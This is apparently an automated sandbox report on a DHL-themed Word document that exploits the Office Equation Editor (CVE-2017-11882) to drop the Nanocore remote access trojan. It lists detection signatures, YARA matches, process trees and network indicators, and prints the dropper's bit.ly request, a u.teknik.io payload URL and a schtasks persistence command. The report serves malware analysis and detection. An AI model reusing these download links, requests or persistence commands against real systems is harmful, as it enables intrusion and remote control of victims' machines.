Play interactive tour

Edit tour

Analysis Report DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909yy.doc

Overview

General Information

Sample Name:	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909yy.doc
Analysis ID:	357311
MD5:	f89f2bb301dfc15a5c610356985cd85c
SHA1:	add01248aa7c1ec894e05398d1a46721fa3da986
SHA256:	072e26aacdd14b3210884f383ea0fa6705fc2f37661f8fb651d75dbf355b70aa
Tags:	DHLdoc
Infos:
Most interesting Screenshot:

Detection

Nanocore

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected Nanocore Rat

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Sigma detected: Scheduled temp file as task from temp location

Yara detected Nanocore RAT

.NET source code contains potential unpacker

Connects to a URL shortener service

Drops PE files to the user root directory

Machine Learning detection for dropped file

Office equation editor drops PE file

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Sigma detected: Executables Started in Suspicious Folder

Sigma detected: Execution in Non-Executable Folder

Sigma detected: Suspicious Program Location Process Starts

Uses schtasks.exe or at.exe to add and modify task schedules

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Drops PE files to the user directory

Drops certificate files (DER)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Office Equation Editor has been started

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w7x64

WINWORD.EXE (PID: 2264 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)

EQNEDT32.EXE (PID: 1324 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

69577.exe (PID: 2320 cmdline: C:\Users\Public\69577.exe MD5: 8C596990203F7D15651498FDBA84B5F3)

schtasks.exe (PID: 824 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\xWdTBYiTWyTud' /XML 'C:\Users\user\AppData\Local\Temp\tmpA738.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)

69577.exe (PID: 2900 cmdline: {path} MD5: 8C596990203F7D15651498FDBA84B5F3)

69577.exe (PID: 2500 cmdline: {path} MD5: 8C596990203F7D15651498FDBA84B5F3)

69577.exe (PID: 2480 cmdline: {path} MD5: 8C596990203F7D15651498FDBA84B5F3)

69577.exe (PID: 2468 cmdline: {path} MD5: 8C596990203F7D15651498FDBA84B5F3)

69577.exe (PID: 2464 cmdline: {path} MD5: 8C596990203F7D15651498FDBA84B5F3)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000002.2117450780.0000000003259000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x26fa7d:$x1: NanoCore.ClientPluginHost 0x26faba:$x2: IClientNetworkHost 0x2735ed:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000004.00000002.2117450780.0000000003259000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000004.00000002.2117450780.0000000003259000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x26f7e5:$a: NanoCore 0x26f7f5:$a: NanoCore 0x26fa29:$a: NanoCore 0x26fa3d:$a: NanoCore 0x26fa7d:$a: NanoCore 0x26f844:$b: ClientPlugin 0x26fa46:$b: ClientPlugin 0x26fa86:$b: ClientPlugin 0x1bbeea:$c: ProjectData 0x26f96b:$c: ProjectData 0x270372:$d: DESCrypto 0x277d3e:$e: KeepAlive 0x275d2c:$g: LogClientMessage 0x271f27:$i: get_Connected 0x2706a8:$j: #=q 0x2706d8:$j: #=q 0x2706f4:$j: #=q 0x270724:$j: #=q 0x270740:$j: #=q 0x27075c:$j: #=q 0x27078c:$j: #=q
Process Memory Space: 69577.exe PID: 2320	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x6046db:$x1: NanoCore.ClientPluginHost 0x60473c:$x2: IClientNetworkHost 0x609b41:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x617ab3:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: 69577.exe PID: 2320	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: 69577.exe PID: 2320	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x6041e0:$a: NanoCore 0x6041fc:$a: NanoCore 0x604357:$a: NanoCore 0x604366:$a: NanoCore 0x60463f:$a: NanoCore 0x60466b:$a: NanoCore 0x6046db:$a: NanoCore 0x61411d:$a: NanoCore 0x61412f:$a: NanoCore 0x61416b:$a: NanoCore 0x604287:$b: ClientPlugin 0x6043b0:$b: ClientPlugin 0x604674:$b: ClientPlugin 0x6046e4:$b: ClientPlugin 0x614138:$b: ClientPlugin 0x614174:$b: ClientPlugin 0x5a803e:$c: ProjectData 0x5a9c3e:$c: ProjectData 0x5f8494:$c: ProjectData 0x5fa094:$c: ProjectData 0x6044fd:$c: ProjectData
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
4.2.69577.exe.34b88f0.4.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
4.2.69577.exe.34b88f0.4.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.2.69577.exe.34b88f0.4.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
4.2.69577.exe.34b88f0.4.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
4.2.69577.exe.34b88f0.4.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
4.2.69577.exe.34b88f0.4.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.2.69577.exe.34b88f0.4.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
4.2.69577.exe.33a0240.3.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x12883d:$x1: NanoCore.ClientPluginHost 0x12887a:$x2: IClientNetworkHost 0x12c3ad:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
4.2.69577.exe.33a0240.3.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.2.69577.exe.33a0240.3.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x1285a5:$a: NanoCore 0x1285b5:$a: NanoCore 0x1287e9:$a: NanoCore 0x1287fd:$a: NanoCore 0x12883d:$a: NanoCore 0x128604:$b: ClientPlugin 0x128806:$b: ClientPlugin 0x128846:$b: ClientPlugin 0x74caa:$c: ProjectData 0x12872b:$c: ProjectData 0x129132:$d: DESCrypto 0x130afe:$e: KeepAlive 0x12eaec:$g: LogClientMessage 0x12ace7:$i: get_Connected 0x129468:$j: #=q 0x129498:$j: #=q 0x1294b4:$j: #=q 0x1294e4:$j: #=q 0x129500:$j: #=q 0x12951c:$j: #=q 0x12954c:$j: #=q
Click to see the 5 entries

Sigma Overview

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882

Show sources

Source: Process started

Author: Florian Roth: Data: Command: C:\Users\Public\69577.exe, CommandLine: C:\Users\Public\69577.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\69577.exe, NewProcessName: C:\Users\Public\69577.exe, OriginalFileName: C:\Users\Public\69577.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1324, ProcessCommandLine: C:\Users\Public\69577.exe, ProcessId: 2320

Sigma detected: EQNEDT32.EXE connecting to internet

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 67.199.248.11, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1324, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1324, TargetFilename: C:\Users\Public\69577.exe

Sigma detected: Scheduled temp file as task from temp location

Show sources

Source: Process started

Author: Joe Security: Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\xWdTBYiTWyTud' /XML 'C:\Users\user\AppData\Local\Temp\tmpA738.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\xWdTBYiTWyTud' /XML 'C:\Users\user\AppData\Local\Temp\tmpA738.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\Public\69577.exe, ParentImage: C:\Users\Public\69577.exe, ParentProcessId: 2320, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\xWdTBYiTWyTud' /XML 'C:\Users\user\AppData\Local\Temp\tmpA738.tmp', ProcessId: 824

Sigma detected: Executables Started in Suspicious Folder

Show sources

Source: Process started

Sigma detected: Execution in Non-Executable Folder

Show sources

Source: Process started

Sigma detected: Suspicious Program Location Process Starts

Show sources

Source: Process started

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909yy.doc

ReversingLabs: Detection: 27%

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000004.00000002.2117450780.0000000003259000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 69577.exe PID: 2320, type: MEMORY
Source: Yara match	File source: 4.2.69577.exe.34b88f0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.69577.exe.34b88f0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.69577.exe.33a0240.3.raw.unpack, type: UNPACKEDPE

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\xWdTBYiTWyTud.exe	Joe Sandbox ML: detected
Source: C:\Users\Public\69577.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\HOMqO[1].txt	Joe Sandbox ML: detected

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\Public\69577.exe

Jump to behavior

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Compliance:

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Software Vulnerabilities:

Source: global traffic

DNS query: name: bit.ly

Source: global traffic

TCP traffic: 192.168.2.22:49166 -> 5.79.72.163:443

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 67.199.248.11:80

Networking:

Connects to a URL shortener service

Show sources

Source: unknown

DNS query: name: bit.ly

Source: Joe Sandbox View

IP Address: 67.199.248.11 67.199.248.11

Source: global traffic

HTTP traffic detected: GET /3kijui1 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: bit.lyConnection: Keep-Alive

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B5F6BABB-61BE-41BF-89DB-AF92964D1C77}.tmp

Jump to behavior

Source: global traffic

Source: unknown

DNS traffic detected: queries for: bit.ly

Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.2.dr	String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
Source: 77EC63BDA74BD0D0E0426DC8F8008506.2.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: 69577.exe, 00000004.00000002.2120004979.00000000056C0000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: 69577.exe, 00000004.00000002.2116349948.0000000002251000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 69577.exe, 00000004.00000002.2120004979.00000000056C0000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: 3kijui1[1].htm.2.dr	String found in binary or memory: https://u.teknik.io/HOMqO.txt

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown	Network traffic detected: HTTP traffic on port 49166 -> 443

E-Banking Fraud:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000004.00000002.2117450780.0000000003259000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 69577.exe PID: 2320, type: MEMORY
Source: Yara match	File source: 4.2.69577.exe.34b88f0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.69577.exe.34b88f0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.69577.exe.33a0240.3.raw.unpack, type: UNPACKEDPE

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A

Jump to dropped file

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000004.00000002.2117450780.0000000003259000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000004.00000002.2117450780.0000000003259000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: 69577.exe PID: 2320, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: 69577.exe PID: 2320, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.2.69577.exe.34b88f0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.69577.exe.34b88f0.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.2.69577.exe.34b88f0.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.69577.exe.34b88f0.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.2.69577.exe.33a0240.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.69577.exe.33a0240.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\69577.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\HOMqO[1].txt			Jump to dropped file

Source: C:\Users\Public\69577.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\69577.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior

Source: C:\Users\Public\69577.exe	Code function: 4_2_001E2A00	4_2_001E2A00
Source: C:\Users\Public\69577.exe	Code function: 4_2_001E9CD0	4_2_001E9CD0
Source: C:\Users\Public\69577.exe	Code function: 4_2_001E3941	4_2_001E3941
Source: C:\Users\Public\69577.exe	Code function: 4_2_001E9B4A	4_2_001E9B4A
Source: C:\Users\Public\69577.exe	Code function: 4_2_001E568D	4_2_001E568D
Source: C:\Users\Public\69577.exe	Code function: 4_2_001E3700	4_2_001E3700
Source: C:\Users\Public\69577.exe	Code function: 4_2_004F2FE0	4_2_004F2FE0
Source: C:\Users\Public\69577.exe	Code function: 4_2_003E66F2	4_2_003E66F2
Source: C:\Users\Public\69577.exe	Code function: 4_2_001E00A4	4_2_001E00A4
Source: C:\Users\Public\69577.exe	Code function: 4_2_001E04E0	4_2_001E04E0
Source: C:\Users\Public\69577.exe	Code function: 7_2_003E66F2	7_2_003E66F2

Source: 00000004.00000002.2117450780.0000000003259000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000004.00000002.2117450780.0000000003259000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: 69577.exe PID: 2320, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: 69577.exe PID: 2320, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 4.2.69577.exe.34b88f0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.69577.exe.34b88f0.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 4.2.69577.exe.34b88f0.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.69577.exe.34b88f0.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.69577.exe.34b88f0.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 4.2.69577.exe.33a0240.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.69577.exe.33a0240.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore

Source: xWdTBYiTWyTud.exe.4.dr

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.expl.evad.winDOC@16/20@2/2

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$L88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909yy.doc

Jump to behavior

Source: C:\Users\Public\69577.exe

Mutant created: \Sessions\1\BaseNamedObjects\gztXuihPvFgNHOAEWZySf

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRB7CA.tmp

Jump to behavior

Source: C:\Windows\SysWOW64\schtasks.exe

Console Write: ................P.......................(.P.....`.......8...............Pt......................................................................

Jump to behavior

Source: C:\Users\Public\69577.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909yy.doc

ReversingLabs: Detection: 27%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown	Process created: C:\Users\Public\69577.exe C:\Users\Public\69577.exe
Source: unknown	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\xWdTBYiTWyTud' /XML 'C:\Users\user\AppData\Local\Temp\tmpA738.tmp'
Source: unknown	Process created: C:\Users\Public\69577.exe {path}
Source: unknown	Process created: C:\Users\Public\69577.exe {path}
Source: unknown	Process created: C:\Users\Public\69577.exe {path}
Source: unknown	Process created: C:\Users\Public\69577.exe {path}
Source: unknown	Process created: C:\Users\Public\69577.exe {path}
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\69577.exe C:\Users\Public\69577.exe	Jump to behavior
Source: C:\Users\Public\69577.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\xWdTBYiTWyTud' /XML 'C:\Users\user\AppData\Local\Temp\tmpA738.tmp'	Jump to behavior
Source: C:\Users\Public\69577.exe	Process created: C:\Users\Public\69577.exe {path}	Jump to behavior
Source: C:\Users\Public\69577.exe	Process created: C:\Users\Public\69577.exe {path}	Jump to behavior
Source: C:\Users\Public\69577.exe	Process created: C:\Users\Public\69577.exe {path}	Jump to behavior
Source: C:\Users\Public\69577.exe	Process created: C:\Users\Public\69577.exe {path}	Jump to behavior
Source: C:\Users\Public\69577.exe	Process created: C:\Users\Public\69577.exe {path}	Jump to behavior

Source: C:\Users\Public\69577.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\Public\69577.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909yy.doc

Static file information: File size 1380809 > 1048576

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: xWdTBYiTWyTud.exe.4.dr, Login.cs	.Net Code: set_Name System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.2.69577.exe.3e0000.0.unpack, Login.cs	.Net Code: set_Name System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.69577.exe.3e0000.0.unpack, Login.cs	.Net Code: set_Name System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.0.69577.exe.3e0000.0.unpack, Login.cs	.Net Code: set_Name System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
